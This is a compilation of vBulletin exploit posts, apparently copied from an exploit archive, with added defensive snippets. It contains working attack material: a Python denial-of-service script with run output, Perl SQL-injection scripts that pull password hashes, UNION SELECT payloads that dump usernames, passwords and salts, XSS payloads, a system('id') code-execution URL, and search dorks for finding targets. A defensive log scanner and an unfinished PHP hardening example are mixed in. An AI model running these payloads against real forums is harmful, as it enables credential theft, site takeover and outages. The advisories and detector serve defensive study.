kill=raw_input("Some 20-30 will be enough:")
try:
    for i in range(1,int(kill)):
        print i
        res1 = urllib.urlopen(url).read(200)
        print res1
except(IOError),msg: print "Server will be done by now"
 
 
################################################################
C:\Python25>python vbexploit.py
####################################
#[+]ICW 0-day Domain Crasher #
#[+] Bug found by Yash [ICW] #
#[+] Exploit Coded by FB1H2S [ICW] #
#[+] Care-Taker d4rk-blu [ICW] #
#[+] Indian Cyber Warriors #
####################################
 
Enter Domain Adress:
[+]Ex: www.site.com<http://www.site.com>: sitehere
 
[+]Server php memmory is:32 MB
[+]Enter the No of request you wann send:20
1
2
3
Script will cause DOS.
 
 
#Yash (yash@andhrahackers.com<mailto:yash@andhrahackers.com>)
 
#################################################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#Thanks: SaiSatish,FB1H2S,d4rk-blu™,Mannu,Harin,Jappy,Dj Hoodlum Don,Sam,Circuit,cph4cker
#Shoutz: hg_H@x0r,r45c4l,41w@r10r,Hackuin
#Catch us at www.andhrahackers.com<http://www.andhrahackers.com> or www.teamicw.in<http://www.teamicw.in>
# Thnx to FB1H2S for Python Code :-)
n/a/vBulletin LAST.PHP SQL Injection Vulnerability ( php)

Code:
Example:
 
http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201
 
# milw0rm.com [2004-11-15]
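As an added defender-side example, not part of any post on this page, the following Python scans constructed access-log lines for the request shapes the GET-based proofs of concept above use: the misc.php nested-variable template, a GLOBALS[] key on forumdisplay.php, a UNION SELECT in calendar.php/last.php style query strings, an oversized vsacb_resnr for the Cyb statistics add-on, and the validator.php?op= step that vbfd.py performs. The log lines, the MAX_RESNR threshold and the rule names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Common Log Format lines standing in for a vBulletin host's access log.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Apr/2012:10:00:01 +0000] "GET /forum/showthread.php?t=12 HTTP/1.1" 200 5120
203.0.113.7 - - [07/Apr/2012:10:00:02 +0000] "GET /forum/misc.php?do=page&template=%7B%24%7Bphpinfo()%7D%7D HTTP/1.1" 200 812
203.0.113.7 - - [07/Apr/2012:10:00:03 +0000] "GET /forum/forumdisplay.php?GLOBALS[]=1&f=2&comma=%22.system('id').%22 HTTP/1.1" 200 14000
203.0.113.9 - - [07/Apr/2012:10:00:04 +0000] "GET /forum/calendar.php?s=&action=edit&eventid=14%20union%20(SELECT%20userid%20FROM%20calendar_events) HTTP/1.1" 500 230
203.0.113.9 - - [07/Apr/2012:10:00:05 +0000] "GET /forum/misc.php?show=latestposts&vsacb_resnr=10000000 HTTP/1.1" 500 0
203.0.113.9 - - [07/Apr/2012:10:00:06 +0000] "GET /forum/misc.php?show=latestposts&vsacb_resnr=15 HTTP/1.1" 200 9000
203.0.113.11 - - [07/Apr/2012:10:00:07 +0000] "GET /forum/validator.php?op=constructedtoken HTTP/1.1" 200 4100
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
UNION_RE = re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)
MAX_RESNR = 500   # assumed sane upper bound for the "latest posts" count


def classify(target):
    """Return the rule names tripped by one request target (path?query)."""
    parts = urlsplit(target)
    script = parts.path.lower().rsplit("/", 1)[-1]
    params = dict(parse_qsl(parts.query, keep_blank_values=True))  # %xx decoded
    hits = []
    # vBulletin <= 3.0.6: nested-variable PHP injection through misc.php?template=
    if script == "misc.php" and "{$" in params.get("template", ""):
        hits.append("template-nested-variable")
    # vBulletin 3.0.x forumdisplay.php RCE relies on a GLOBALS[] request key
    if any(k == "GLOBALS" or k.startswith("GLOBALS[") for k in params):
        hits.append("globals-override")
    # calendar.php / last.php / fileinfo.php style UNION SELECT in the query string
    if UNION_RE.search(unquote_plus(parts.query)):
        hits.append("union-select")
    # Cyb "Advanced Forum Statistics": oversized vsacb_resnr exhausts PHP memory
    resnr = params.get("vsacb_resnr", "")
    if resnr.isdigit() and int(resnr) > MAX_RESNR:
        hits.append("resnr-exhaustion")
    # vbfd.py: the validator.php?op=<token> request that lists file paths
    if script == "validator.php" and "op" in params:
        hits.append("validator-token-use")
    return hits


def scan(log_text):
    """Return (client ip, script path, hits) for every line tripping a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not CLF; skip rather than guess
        hits = classify(m.group("target"))
        if hits:
            findings.append((m.group("ip"), urlsplit(m.group("target")).path, hits))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(ip, path, ",".join(hits))
```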
MaXe/vBulletin 3.8.6 Credential Disclosure 

Code:
Versions Affected: 3.8.6 (Only!)
 
Info:
Content publishing, search, security, and more—vBulletin has it all. Whether
it’s available features, support, or ease-of-use, vBulletin offers the most for
your money. Learn more about what makes vBulletin the choice for people
who are serious about creating thriving online communities.
 
External Links:
http://www.vbulletin.com/
 
 
-:: The Advisory ::-
vBulletin is prone to information disclosure of the entire database
credentials used in config.php via the faq.php file.
 
By searching for "database" on a vulnerable installation of vBulletin
an attacker is shown the information mentioned above.
 
-:: Solution ::-
A patch is available from http://members.vbulletin.com
 
Alternatively, search for "database_ingo" in the Phrase Manager
within the Admin Control Panel, and delete or edit all critical details.
 
 
Disclosure Information:
- vBulletin Security Notice & Patch: 22nd July 2010
- Vulnerability Researched and Disclosed: 22nd July
 
Note:
After searching the Internet a bit I discovered that I wasn't the
only one who knew about this bug. Please note that I give full
credit to the rightful finder / owner of this exploit.
 
References:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/2857-vbulletin-3-8-6-critical-information-disclosure.html
http://www.vbulletin.com/forum/showthread.php?357818-Security-Patch-Release-3.8.6-PL1
 
 
 
All of the best,
MaXe
vBulletin version 3.8.6 suffers from a database credential disclosure vulnerability.

MaXe/vBulletin 4.0.8 Cross Site Scripting 

Code:
vBulletin - Persistent Cross Site Scripting via Profile Customization
 
 
Versions Affected: 4.0.8 (3.8.* is not vulnerable.)
 
Info:
Content publishing, search, security, and more— vBulletin has it all.
Whether it’s available features, support, or ease-of-use, vBulletin offers
the most for your money. Learn more about what makes vBulletin the
choice for people who are serious about creating thriving online communities.
 
External Links:
http://www.vbulletin.com
 
Credits: MaXe (@InterN0T)
 
 
-:: The Advisory ::-
vBulletin is prone to a Persistent Cross Site Scripting vulnerability within the
Profile Customization feature. If this feature is not enabled the vulnerability 
does not exist and the installation of vBulletin is thereby secure.
 
Within the profile customization fields, it is possible to enter colour codes,
rgb codes and even images. The image url() function does not sanitize user
input in a sufficient way causing vBulletin to be vulnerable to XSS attacks.
 
[1] Private Reflected XSS:
An attacker can inject scripts in a simple way, which is only visible to the attacker.
 
Proof of Concept:
url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101,114,78,48,84,11))" />)
(This is only visible to the attacker when he or she is logged in, and browsing his or her own profile.)
 
[2] Global Reflected XSS:
An attacker can inject malicious CSS data executing javascript, which is then visible
to anyone browsing the user profile. Even guests visiting the malicious user profile.
 
Proof of Concept: (IE6 only, may not work in IE7+ and FF)
url(/);background:url(javascript:document.write(1337))
url(/);width:expression(alert('www.intern0t.net'))
 
 
Please note that some of these strings may be too long to be injected. However a
blog entry at Exploit-DB and a video on YouTube will be released very soon.
 
 
-:: Solution ::-
Turn off profile customization immediately for users able to customize their profile!
When a security patch has been provided by the vendor, enable this feature again.
 
 
Disclosure Information:
- Vulnerability found and researched: 11th November 2010
- Vendor (vBulletin Solutions / IB) contacted: 11th November
- Disclosed to Exploit-DB, Bugtraq and InterN0T: 14th November
 
References:
http://forum.intern0t.net/intern0t-advisories/3349-vbulletin-4-0-8-persistent-xss-profile-customization.html
http://www.vbulletin.com/forum/showthread.php?366834-vbulletin-4-profile-customization-exploit
http://blip.tv/file/4381880
http://www.youtube.com/watch?v=LOcLFVAqgOU
vBulletin version 4.0.8 suffers from a persistent cross site scripting vulnerability.

mc2_s3lector/vBulletin 4.0.4 Code Execution 

Code:
/*======================================================================*\
|| #################################################################### ||
|| # Vurnerebility vBulletin - http://www.vbulletin.org               # ||
|| # Local or adserver Javascript,forumdisplay.php" Code Execution    # ||
|| # Version license 4.0.4                        # ||
|| # info set cookies, error issue & critical-information-disclosure  # ||
|| # Dork powered by vBulletin 4.0.4                      # ||
|| # author mc2_s3lector                          # ||
|| # Contact|http://www.yogyacarderlink.web.id                # ||
|| #################################################################### ||
\*======================================================================*/
 
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
 
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
 
http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart
 
/*======================================================================*\
|# #####################################################################  |
 # gretz: all family(www.yogyacarderlink.web.id)            # |         
|# v3n0m,m4rc0,eidelweis,Joglo,setanmuda,z0mb13,byebye,93l4p_9uL1t@,    # |
|# IdioT_InsidE,dewancc,craxboy90,lingga,horcux,artupas,s0ul_34t3r, # |
|# mywisdom,Travis,a9d1co0L,L4zyb0i,Jastis & all            # |
|# KeDaiComputerworks.org                       # |
|# my bro one-d4y,elpaci4n0,Ariwira,h3ndry_Slank,raven_ville, t3j0,& all# |                       
|# Indesign Computer Care,logcode.net,flowerjingga,.alboraaq.com    # |
|  #####################################################################  |
\*======================================================================*/
vBulletin version 4.0.4 suffers from a code execution vulnerability.

jos_ali_joe/vBulletin Downloads FileInfo SQL Injection 

Code:
===========================================
Vbulletin Downloads FileInfo SQL Injection 
===========================================
 
[+]Title   : Vbulletin Downloads FileInfo SQL Injection 
[+]Software    : FileInfo
[+]Vendor    : http://www.vbulletin.com
[+]Download   : http://www.vbulletin.com/download.php
[+]Author   : jos_ali_joe
[+]Contact   : josalijoe[at]yahoo[dot]com
[+]Home    : http://josalijoe.wordpress.com/
 
.___             .___                                .__                 _________              .___                
|   |  ____    __| _/  ____    ____    ____    ______|__|_____     ____  \_   ___ \   ____    __| _/  ____  _______ 
|   | /    \  / __ |  /  _ \  /    \ _/ __ \  /  ___/|  |\__  \   /    \ /    \  \/  /  _ \  / __ | _/ __ \ \_  __ \
|   ||   |  \/ /_/ | (  <_> )|   |  \\  ___/  \___ \ |  | / __ \_|   |  \\     \____(  <_> )/ /_/ | \  ___/  |  | \/
|___||___|  /\____ |  \____/ |___|  / \___  >/____  >|__|(____  /|___|  / \______  / \____/ \____ |  \___  > |__|   
          \/      \/              \/      \/      \/          \/      \/         \/              \/      \/         
 
 
########################################################################
 
Dork : inurl:"downloads/fileinfo.php"
 
########################################################################
 
------------------------------------------------------------------------
 
SQL Exploit
 
Exploit : +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(username,0x3a,password,0x3a,salt),19,20,21,22,23,24,25,26+from+user/*
 
Demo 
 
Exploit : http://localhost/downloads/fileinfo.php?id=-461+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(username,0x3a,password,0x3a,salt),19,20,21,22,23,24,25,26+from+user/*
 
--------------------------------------------------------------------------
 
 
Greets For :
 
./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew - Security Hub
 
./Byroe Net - Yogya Carderlink - anten4 - All Underground Forum Indonesia
 
My Team : ./Indonesian Coder & inj3ct0r
 
Special Thanks :
 
Security Reason - Packetstorm Security
 
 
[+] Note : 
 
Hacking is not about the answer. Hacking is about the path you take to find the answer.
If you need help, do not ask for the answer;
ask about the path you should take to find the answer for yourself.
vBulletin Downloads FileInfo suffers from a remote SQL injection vulnerability.

Robert Gilbert/vBulletin 4.1.3 Open Redirect

Código:
Product: vBulletin
Version: 3 - 4.1.3
Release Date: 06/02/2011
Risk: Low
Authentication: Not required to exploit.
Remote: Yes
 
Description: 
Multiple Open Redirect vulnerabilities in vBulletin version 4.1.3 and below allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the "url" parameter. By appending ?url=http://attackersite.com to any number of pages, the user will be redirected to a potentially dangerous site. This is particularly interesting when used on the registration form or the password reset form.
 
Exploit Example:
http://forum.pwndshop.com/register.php?do=checkdate&url=http://attackersite.com
 
Vendor Notified: Yes
 
Reference: 
http://www.vbulletin.com/forum/showthread.php/381014-Potential-Phishing-Vector?p=2166441
https://www.owasp.org/index.php/Open_redirect
 
Credit:
 
Robert Gilbert
Senior Consultant
HALOCK Security Labs, Purpose Driven Security(tm)
rgilbert [-at-] halock [-dot-] com 
http://www.halock.com 
http://blog.halock.com 
 
 
vBulletin versions 3 through 4.1.3 suffer from an open redirect vulnerability.

jos_ali_joe/vBulletin 3.6.1 SQL Injection 

Código Perl:
=========================================================
 vBulletin 3.6.1 Remote SQL Injection Exploit
=========================================================

[+] Title   : vBulletin 3.6.1 Remote SQL Injection Exploit
[+] Author  : jos_ali_joe
[+] Contact : josalijoe@yahoo.com
[+] Home    : http://josalijoe.wordpress.com/


##########################################################

#!/usr/bin/perl

use IO::Socket;

print q{
######################################################
# DeluxeBB Remote SQL Injection Exploit              #
# vbulletin Remote SQL Injection Exploit             #
######################################################
};

if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory victim_userid

       perl dbbxpl.pl www.nekisite.com /forum1
};
}

$server = $ARGV[0]; $dir = $ARGV[1]; $user = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

# strip a leading http:// from the host argument
$server =~ s/(http:\/\/)//eg;

$path = $dir; $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user;

print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";

print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
  # any 32-character word in the response is reported as the hash
  if ($answer =~ /(\w{32})/)
  {
    if ($1 ne 0) {
      print "Password Hash is: ".$1."\r\n";
      print "--------------------------------------------------------------------------------------\r\n";
    }
    exit();
  }
}
print "------------------------------------------------------------------------------------------------\r\n";
  
########################################################################
  
Thanx :

./Me Family ATeN4 : ./N4ck0 Aury TeRRenJr

Greets For :

./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker

My Team : ./Indonesian Coder
vBulletin version 3.6.1 suffers from a remote SQL injection vulnerability.

The-0utl4w/vBulletin 3.8.2 Cross Site Scripting 


Código:
vBulletin 3.8.2 adminCP Cross-Site Scripting
R.I.P DrtRp - We miss you
---------------------------------------------
Original Post at http://forum.aria-security.com/en/showthread.php?p=1179
Greetz to Aura & all Aria-Security Mods & Members
 
These were all tested on vBulletin 3.8.0 RC2, so other versions may be affected.
 
1. User Titles. admincp/usertitle.php?do=modify. Add a new title. Use the following code as the title name.
 
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
or any other XSS code.
 
2. Post Icons. admincp/image.php?do=add&table=icon. Add a new title. Give a wrong path such as /images/aria.gif. Use the following code as the title name.
 
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
 
3. Post new Smilies. image.php?do=add&table=smilie ... Same as #2. Use the following code as the title name.
 
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
 
4. New avatar. admincp/image.php?do=add&table=avatar. Same as #2. Don't forget the update. Use the following code as the title name.
 
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
 
 
 
The-0utl4w
http://Aria-Security.com
/* the-0utl4w.com
vBulletin version 3.8.2 suffers from persistent cross site scripting vulnerabilities.

Andhra Hackers/vBulletin Cyb - Advanced Forum Statistics Denial Of Service 

Código:
# Exploit Title: vBulletin "Cyb - Advanced Forum Statistics" DOS
# Date: 10-4-2010
# Author: Andhra Hackers
# Software Link:
# Version: Web Application
# Tested on: Apache/Unix
# CVE : [if exists]
# Code :
 
 
PHP crashes have existed for a long time, and there were several issues responsible for that.
1) The PHP pack() function bug has been around for a long time: if PHP tries to allocate more memory than is generally allocated to a PHP function, the request is terminated and PHP exits/crashes; this might even put a huge load on the server.
 
2) PHP memory allocation is configured via the php.ini file of the PHP installation, so if we could make PHP try to load more memory than it can handle, then we could possibly crash PHP or even the server, causing huge CPU usage.
 
3) A vulnerability exists in the vBulletin add-on "Cyb - Advanced Forum Statistics" in the misc.php file (show=latestposts&vsacb_resnr=), where the application loads the latest 'n' posts
depending on the (vsacb_resnr=n) value. As the number of posts "vsacb_resnr" is user supplied, we could make vBulletin load a huge amount of data from the DB, causing it to run out of memory and crash PHP, and the huge load may also crash the hosting Apache, which won't be able to recover easily.
 
Attached is exploit code which could easily crash a vBulletin that has the "Cyb - Advanced Forum Statistics" add-on installed.
You could either use the attached exploit code to DOS the server, or simply go to the vulnerable page and
send simultaneous requests by refreshing the page.
 
 
An attacker could exploit this issue to crash the installed PHP, and the crash might DOS the entire server for hours, or the attacker may be able to
download PHP files from the server.
 
A quick fix for this is to modify the php.ini config file and increase the PHP allocated memory to a higher value.
 
 
Exploit:
import urllib,urllib2,re
print "####################################"
print "#[+]ICW 0-day Domain Crasher       #"
print "#[+] Exploit found by Yash   [ICW] #"
print "#[+] Exploit Coded by FB1H2S [ICW] #"
print "#[+] Care-Taker d4rk-blu     [ICW] #"
print "#[+]     Indian Cyber Warriors     #"
print "####################################\n"
print "Enter Domain Adress:"
domain=raw_input("[+]Ex: www.site.com<http://www.site.com>:")
url ='http://'+domain+'/misc.php?show=latestposts&vsacb_resnr=10000000'
res = urllib.urlopen(url).read(200)
phpmem= re.findall('of (.*?)bytes.*?',res)
bytes=int(phpmem[0])
mb=bytes/1048576
print '[+]Server php memmory is:'+str(mb)+' MB'
print "[+]Enter the No of request you wann send:"
kill=raw_input("Some 20-30 will be enough:")
try:
   for i in range(1,int(kill)):
      print i
      res1 = urllib.urlopen(url).read(200)
      print res1
except(IOError),msg: print "Server will be FCUK'ed by now"
 
 
################################################################
C:\Python25>python vbexploit.py
####################################
#[+]ICW 0-day Domain Crasher       #
#[+] Bug found by Yash       [ICW] #
#[+] Exploit Coded by FB1H2S [ICW] #
#[+] Care-Taker d4rk-blu     [ICW] #
#[+]     Indian Cyber Warriors     #
####################################
 
Enter Domain Adress:
[+]Ex: www.site.com<http://www.site.com>: sitehere
 
[+]Server php memmory is:32 MB
[+]Enter the No of request you wann send:20
1
2
3
Server will be FCUK'ed by now
 
 
#Yash (yash@andhrahackers.com<mailto:yash@andhrahackers.com>)
 
#################################################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#Thanks: SaiSatish,FB1H2S,d4rk-blu™,Mannu,Harin,Jappy,Dj Hoodlum Don,Sam,Circuit,cph4cker
#Shoutz: hg_H@x0r,r45c4l,41w@r10r,Hackuin
#Catch us at www.andhrahackers.com<http://www.andhrahackers.com> or www.teamicw.in<http://www.teamicw.in>
# Thnx to FB1H2S for Python Code :-)
vBulletin Cyb - Advanced Forum Statistics suffers from a denial of service vulnerability.

indoushka/vBulletin 4.0.2 Cross Site Scripting 

Código:
========================================================================================
| # Title    : vBulletin™ Version 4.0.2 Cross Site Scripting in URI Vulnerability
| # Author   : indoushka
| # email    : indoushka@hotmail.com
| # Home     : www.iq-ty.com
| # Web Site : http://www.digzip.com/files/54QE0JXS...ulledfinal.rar
| # Dork     : Powered by vBulletin™ Version 4.0.2
| # Tested on: Windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
| # Bug      : XSS
======================      Exploit By indoushka       =================================
# Exploit  :  
 
http://127.0.0.1/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ==========================================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net 
www.alkrsan.net * www.kadmiwe.net * www.arhack.net   
--------------------------------------------------------------------------------------------------------------
vBulletin version 4.0.2 suffers from a cross site scripting vulnerability.

indoushka/vBulletin 4.0.1 SQL Injection 

Código Perl:
#!/usr/bin/perl

use IO::Socket;

print q{
#######################################################################
#    vBulletin™ Version 4.0.1 Remote SQL Injection Exploit            #
#                      By indoushka                                   #
#                     www.iq-ty.com/vb                                #
#               Souk Naamane  (00213771818860)                        #
#           Algeria Hackerz (indoushka@hotmail.com)                   #
#          Dork: Powered by vBulletin™ Version 4.0.1                  #
#######################################################################
};

if (!$ARGV[2]) {
print q{

Usage: perl VB4.0.1.pl host /directory victim_userid

       perl VB4.0.1.pl www.vb.com /forum1

};
}

$server = $ARGV[0]; $dir = $ARGV[1]; $user = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

# strip a leading http:// from the host argument
$server =~ s/(http:\/\/)//eg;

$path = $dir; $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user;

print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";

print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
  # any 32-character word in the response is reported as the hash
  if ($answer =~ /(\w{32})/)
  {
    if ($1 ne 0) {
      print "Password is: ".$1."\r\n";
      print "--------------------------------------------------------------------------------------\r\n";
    }
    exit();
  }
}
print "------------------------------------------------------------------------------------------------\r\n";

================================
Dz-Ghost Team
========================================================
Greetz: thanks to the people of Sidi Bel Abbès province (22), the people of Mascara, Tiaret, Djelfa, M'Sila, Tlemcen, Nedroma, Maghnia, Oujda, Agadir, Fes and Meknes, and Oran
Exploit-db Team (loneferret+Exploits+dookie2000ca) all my friends: Dos-Dz Snakespc His0k4 Hussin-Str0ke Saoucha Star08 * www.hackteach.org * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad redda mourad (dgsn.dz) * www.cyber-mirror.org
www.forums.ibb7.com * www.owned-m.com * Stake (v4-team.com) * www.dev-chat.com * Cyb3r IntRue (avengers team)
* www.securityreason.com * www.packetstormsecurity.org * www.best-sec.net * www.zone-h.net * www.m-y.cc
* www.hacker.ps * no-exploit.com * www.bug-blog.de * www.bawassil.com * www.host4ll.com * www.xp10.me
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) * www.kadmiwe.net * SoldierOfAllah (www.m4r0c-s3curity.cc) * www.arhack.net * www.google.com * www.sec-eviles.com
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.arabic-m.com * www.securitywall.org * r1z (www.sec-r1z.com) * www.zac003.persiangig.ir * www.0xblackhat.ir * www.mormoroth.net
------------------------------------------------------------------------------------------------------------
vBulletin version 4.0.1 remote SQL injection exploit.

W4n73d/vBulletin 4.0.1 Cross Site Scripting 

Código:
[+] Script: vBulletin™ Version 4.0.1
[+] Vendor: www.vbulletin.com
[+] Author: W4n73d
[+] Mail: w3hrm4cht@gmail.com
 
[~] Bug: Cross Site Scripting (XSS)
[~] Exploit: http://[HOST]/forum/calendar.php="<script>alert("! XSS !");</script>
[~] Demo: http://www.overbr.com.br/forum/calendar.php="<script>alert("! XSS !");</script>
 
[+] Date: 12/02/2010
vBulletin version 4.0.1 appears to suffer from a cross site scripting vulnerability in calendar.php.

FB1H2S/vBulletin 4.1.3 SQL Injection 

Código:
# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S  
# Software Link: [http://www.vbulletin.com/]
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : [http://members.vbulletin.com/]
 
######################################################################################################
Vulnerability:
######################################################################################################
 
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.
 
#####################################################################################################
Vulnerable Code:
#####################################################################################################
 
File:    /vbforum/search/type/socialgroupmessage.php
Line No: 388
Parameter : messagegroupid
 
 
 
 
    if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)
    {
      $value = $registry->GPC['messagegroupid'];
      if (!is_array($value))
      {
        $value = array($value);
      }

      if (!(in_array(' ',$value) OR in_array('',$value)))
      {
        if ($rst = $vbulletin->db->query_read("
          SELECT socialgroup.name
          FROM " . TABLE_PREFIX."socialgroup AS socialgroup
--->      WHERE socialgroup.groupid IN (" . implode(', ', $value) .")")
      }
 
 
 
############################################################################################
Exploitation:
############################################################################################
Post data on: -->search.php?search_type=1
        --> Search Single Content Type
 
Keywords :   Valid Group Message
 
Search Type : Group Messages 
 
Search in Group : Valid Group Id
 
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
 
##########################################################################################
More Details:
##########################################################################################
Http://www.Garage4Hackers.com
http://www.garage4hackers.com/showth...rability-0-day
 
 
###########################################################################################
Note:
###########################################################################################
 
The funny part was that a similar bug was found in the same module (the search query) two months back. Anyway, Vbulletin has released a patch, as it was reported to them by altex, hence
customers are safe except those lousy Admins. And this bug is for people to play with the many Nulled VB sites out there. " Say No to Piracy Disclosure ".
vBulletin versions 4.0.x through 4.1.3 suffer from a remote SQL injection vulnerability in messagegroupid.
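An added example, not vBulletin's own code, of the implode() pattern quoted in the advisory beside a hardened version that accepts only digit strings and binds each id as a placeholder. It assumes a PDO handle and an unprefixed socialgroup table; the function names are hypothetical and the inputs are constructed.

```php
<?php
// Added example (not vBulletin code): the advisory's implode() pattern beside
// a hardened version. Assumptions: $db is a PDO handle, the table is named
// socialgroup with no prefix, and the function names are hypothetical.

// Vulnerable pattern as quoted in the advisory: each array element is pasted
// into the IN (...) list unchanged, so SQL inside an element becomes SQL.
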